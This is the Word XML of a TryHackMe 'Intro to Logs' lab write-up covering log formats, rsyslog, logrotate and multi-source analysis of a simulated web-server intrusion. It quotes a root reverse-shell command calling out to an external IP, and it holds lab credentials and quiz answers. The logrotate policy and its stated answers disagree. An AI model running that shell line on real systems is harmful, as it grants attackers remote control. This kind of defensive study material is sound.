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EFF25" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Intro to Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1F08E1" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E63946"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TryHackMe Lab Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A482CB" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="5" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Blue Team  |  Log Analysis  |  zenmier30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193A8488" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="0062322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3223" w14:paraId="124D96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26A0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Platform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5C46E" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TryHackMe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="39C738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3862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Target IP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E497" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.48.187.73  (WEBSRV-02, Ubuntu 20.04 LTS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="072128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5B02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Login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1353" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>damianhall / Logs321!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="3977E9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A0B1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Scenario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62C4" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SwiftSpend Financial — active web server recon and intrusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CF4C667" w14:textId="77777777" w:rsidR="00D47BD5" w:rsidRDefault="00D47BD5">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C308F36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Task 2 — Logs as Evidence of Historical Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF30294" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The task establishes logs as the primary forensic evidence source. Using the SwiftSpend Financial scenario, log data from the GitLab Nginx access log was used to reconstruct a full incident narrative by answering the 5W investigative framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB6BA2F" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431195C9" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Key finding from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B5290A"/>
        </w:rPr>
        <w:t>/var/log/gitlab/nginx/access.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AC0B7A" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="0062322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23223" w14:paraId="58D57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F76D" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5W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DB9B" w14:textId="77777777" w:rsidR="00623223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623223" w14:paraId="78D2A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6877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What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5EA6" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Adversary accessed SwiftSpend's GitLab instance using a publicly exposed API key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="01015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7BA7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When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7CEC" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22:10, Wednesday 8 September 2023.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="2CAF01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9F36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Where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A699" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source device at 10.10.133.168, VPN Users segment (10.10.133.0/24).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="0E002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541D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Who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B297" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Firefox/115.0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="12257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2AB5" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impact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2E2F" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote code execution achieved on gitlab.swiftspend.finance; web shell uploaded for persistent access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="438784CA" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FE1146" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Answers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Colleague name on Desktop = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Perry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  Suggested log file = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B5290A"/>
        </w:rPr>
        <w:t>/var/log/gitlab/nginx/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE986BD" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E2F879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Task 3 — Log Types, Formats, and Standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862FE84" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>This task covered how logs are structured and governed. Two core web server log formats were examined on the lab VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CAEF83" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C533B19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Common Log Format (CLF) — records the source IP, timestamp, HTTP method, path, status code, and response size. The baseline standard for web access logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F04FF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NCSA Combined Log Format — extends CLF with a Referer and User-Agent field. This is the default format used by Nginx and is the format used in the GitLab access log investigated in this room.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F9F73" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D4DF70" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Log standards referenced include MITRE CEE for interoperability, NIST SP 800-92 for federal log management guidance, OWASP Logging Cheat Sheet for application security logging, and Syslog Protocol for transport-layer separation between log generators and storage systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C8B4E" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C8EAFB" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Answers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Log type = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Web Server Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  Log format = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Combined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB6924" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312D4845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Task 4 — Log Collection, Management, and Centralisation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A4FC4" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">This task introduced </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>rsyslog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the centralisation daemon on WEBSRV-02. A custom drop-in configuration was created to route all sshd messages to a dedicated log file, separating SSH activity from the general syslog stream for easier analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512DDBC" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD12C5E" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration file created at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B5290A"/>
        </w:rPr>
        <w:t>/etc/rsyslog.d/98-websrv-02-sshd.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769FFF64" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73159915" w14:textId="77777777" w:rsidR="00623223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B5290A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$FileCreateMode 0644</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9EC147" w14:textId="77777777" w:rsidR="00623223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B5290A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:programname, isequal, "sshd" /var/log/websrv-02/rsyslog_sshd.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B698401" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F9F195" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>After restarting rsyslog and initiating a test SSH session, the sshd log file was confirmed populated. Analysis of the generated logs revealed two critical findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B5A516" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778B3387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Brute-force SSH campaign: The username stansimon appeared repeatedly in /var/log/websrv-02/rsyslog_sshd.log with failed authentication entries — indicating sustained credential stuffing against the SSH service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3244A9AC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Reverse shell execution: The rsyslog_cron.log revealed the following command executed by root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DE70E" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F05C712" w14:textId="77777777" w:rsidR="00623223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B5290A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/bin/bash -c "/bin/bash -i &gt;&amp; /dev/tcp/34.253.159.159/9999 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB2E637" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29369C61" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">This confirms a reverse bash shell was established from WEBSRV-02 to the adversary-controlled IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>34.253.159.159</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> on port 9999, consistent with MITRE ATT&amp;CK T1059.004 (Unix Shell) and C2 exfiltration via T1071.001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A0B42" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152EAA89" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Answers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute-force username = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>stansimon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  SIEM-02 IP = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>10.10.10.101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  Root command = reverse shell to 34.253.159.159:9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A510F27" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BF2CA6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Task 5 — Log Storage, Retention, and Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20C236" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">This task demonstrated log lifecycle management using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>logrotate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">. A configuration was created for the sshd log file at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B5290A"/>
        </w:rPr>
        <w:t>/etc/logrotate.d/98-websrv-02-sshd.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the following policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C7464C" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E07953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Rotation: daily — a new log file is created each day and the old one is archived.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9B22F9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Retention: 30 rotated copies kept before the oldest is deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59996F51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Compression: archived logs are gzip-compressed to reduce disk usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E504D7D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Integrity verification: a SHA256 hash of each compressed archive is written to a timestamped text file via the lastaction block — preserving chain-of-custody evidence for forensic purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B9B72A" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B47864" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">The configuration was manually tested with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B5290A"/>
        </w:rPr>
        <w:t>sudo logrotate -f /etc/logrotate.d/98-websrv-02-sshd.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> and verified by listing the /var/log/websrv-02/ directory to confirm the rotated archive and hash file were created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7B354D" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B87B75" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Answers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Copies retained = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  Rotation frequency = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Hourly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764D89F" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D7308A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Task 6 — Hands-on Log Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E03BD" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The final practical task involved analysing logs from four sources simultaneously — the GitLab Nginx access log, rsyslog_cron.log, rsyslog_sshd.log, and the GitLab Rails API JSON log. Because each source uses a different format, direct comparison was not possible without first normalising the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9228D4" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21350537" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">A Unix pipeline using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>awk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sed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grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>uniq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to standardise all four log files into a consistent timestamp-prefixed format, filter for adversary IP 34.253.159.159, sort chronologically, and remove duplicate entries. The consolidated file was then loaded into the Log Viewer tool for structured analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A15CB4D" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012504EB" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Two key analytical concepts were reinforced in this task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A6AD7" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502167D0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Normalisation — the process of transforming raw, heterogeneous log entries into a consistent, parseable format. Without this step, the rsyslog_cron.log returned a 'No date field' error in the Log Viewer because its timestamp format was not recognised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C987442" w14:textId="77777777" w:rsidR="00623223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333333"/>
        </w:rPr>
        <w:t>Enrichment — the process of consolidating normalised log data around a specific entity (such as an IP address) to build a complete picture of its activity across multiple systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB0CC75" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA0A574" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Answers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Log Viewer error = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>No date field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  Standardising parsed data = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Normalisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  Consolidating for IP analysis = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F84435" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745D82D6" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="E63946"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Key IOCs Identified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623223" w14:paraId="3935C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46ED" w14:textId="77777777" w:rsidR="0062322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BD41" w14:textId="77777777" w:rsidR="0062322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2135" w14:textId="77777777" w:rsidR="00623223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623223" w14:paraId="5990D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4F8B" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IP — External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7950" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E63946"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
